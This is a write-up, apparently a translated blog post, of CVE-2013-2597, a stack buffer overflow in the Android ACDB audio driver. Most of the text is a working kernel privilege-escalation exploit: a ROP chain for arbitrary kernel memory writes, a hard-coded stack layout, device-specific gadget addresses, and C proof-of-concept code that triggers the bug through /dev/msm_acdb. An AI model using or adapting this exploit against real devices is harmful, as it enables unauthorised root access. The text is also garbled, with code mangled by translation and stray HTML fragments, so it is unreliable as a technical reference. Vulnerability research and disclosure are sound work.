stack-based buffer Overflow in acdb audio driver (cve-2013-2597)

/*

This article is prepared by Mo Gray Ash, reproduced please indicate the source.

mo Ash Gray mailbox: [email protected]

*/

1. Vulnerability description

The audio driver ACDB provides an IOCTL system interface for the application layer to invoke, however, it does not do a valid bounds check when processing the passed in parameters. Applications can achieve the purpose of elevation of privilege by/dev/msm_acdb device files.

2. Vulnerability Analysis

The original code is as follows

if (Size<= 0) {Pr_err("%s:invalid size sent to driver:%d\ n",__func__,Size);Result= -Efault;GotoDone;}if (Copy_from_user(Data, (void *) (Arg+ sizeof(Size)),Size)) {Pr_err("%s:fail to copy table size%d\ n",__func__,Size);Result= -Efault;GotoDone;}

acdb驱动在处理ioctl的时候，只对输入的参数大小做了size<=0的判断，而没有做>的判断，紧接着，copy_from_user(data, (void *)(arg + sizeof(size)), size)的调用造成局部变量data的栈溢出。

3. 漏洞利用

  Span class= "HL Kwa" >1. Original process-Do_vfs_ioctl call Acdb_ioctl returns   
DO_VFS_IOCTL:STMPW [SP], {r4-r9, LR} ... BL Acdb_ioctl ... ADD sp, SP, #$44//(2) Ldmuw [SP], {R4-R9, PC}//(1) 
 
 2.  acdb_ioctl One of the opportunities to gain control of your PC. The position of the modified register is (3), where you can manipulate all the values of the r4-pc  

Acdb_ioctl: ... ADD sp, SP, #$84ldmuw [sp], {r4-r11, PC}//(3)
Modify the value of the R5,R9,PC through the stack overflow.

3.上面的指令，通过堆栈溢出，控制PC的值，跳转到下面代码执行

STR R5, [R9]//(4) Ldmuw [SP], {r4-r10, PC}//(5)
Here is the key, mainly through the str instruction, the value of the R5 is set to the address of R9, that is, through the stack overflow to achieve arbitrary address write purposes.

4.执行(5)之后，为了堆栈平衡，栈要填充 4*8 字节，然后设置下一跳的PC，即返回到（2）那里去

ADD sp, SP, #$24//(6) Ldmuw [SP], {r4-r9, PC}

5.The location of the actual stack and the location of the p->data require hard-coded adaptation. 
p->data[...] The initial setting is required when initializing. 
hard-coded addresses are analyzed by crashing logs on your PC. 
p->data[i]=i this to test (note: To the data label relative offset, convenient to locate by the stack), in this example, the PC in &p->data[0x9c] position. 

Cases:

< Pre code_snippet_id= "412128" snippet_file_name= "blog_20140630_5_6720553" name= "code" class= "plain" >acdb=> ACDB IOCTL not found! Unable to handle kernel paging request at virtual address 9F9E9D9CPGD = df56c000[9f9e9d9c] *pgd=00000000internal error:oo ps:80000005 [#1] PREEMPT smpmodules linked in:cpu:1 tainted:g W (3.0.8+1.0.21100-02148-g79e6d0e #1) PC is at 0X9F9E9D9CL R is at acdb_ioctl+0x740/0x860 
 
 

6.   set up the stack layout    
 ((unsigned int) &p->data[0x80]) = value;   R5:pc-4*7 ((unsigned int) &p->data[0x90]) = address; R9:pc-4*3 ((unsigned int) &p->data[0x9c]) = (4) address;   PC:PC ((unsigned int) &p->data[0xbc]) = (6) address; PC:PC + 4*8 
  
   4. PoC   

Static Intwrite_value (const Acdb_param *param, unsigned long address, unsigned Long value) {const char *device_name = "    /DEV/MSM_ACDB ";    struct ACDB_IOCTL arg;    int FD;    int ret;    int i;    FD = open (Device_name, o_rdonly);      if (FD < 0) {Alogi ("failed to open%s due to%s.\n", Device_name, Strerror (errno));    return-1;    } arg.size = Param->pc2.pos + 4;    for (i = 0; i < arg.size; i + = 4) {* (unsigned long int *) &arg.data[i] = i; } * (unsigned long int *) &arg.data[param->address_pos] = address; R9<span style= "White-space:pre" ></span> * (unsigned long int *) &arg.data[param->value_pos] = Valu E R5 * (unsigned long int *) &arg.data[param->pc1.pos] = param->pc1.value; * (unsigned long int *) &arg.data[param->pc2.pos] = param->pc2.value; RET = IOCTL (FD, 9999, &arg);    Arbitrary triggering of an ioctl, causing a stack overflow, so that any address write vulnerability to trigger close (FD); return 0;}
Where the value of Param corresponds to the following:

{device_so05d_7_0_d_1_137,       {0x80, 0x90, {0x9c, 0xc03265d8}, {0XBC, 0xc0524d84}}},

5. Bug fixes

Increased control of the size cap

Reference article:

Http://retme.net/index.php/2014/03/31/CVE-2013-2597-acdb.html

https://www.codeaurora.org/projects/security-advisories/stack-based-buffer-overflow-acdb-audio-driver-cve-2013-2597

https://gist.github.com/fi01/5857693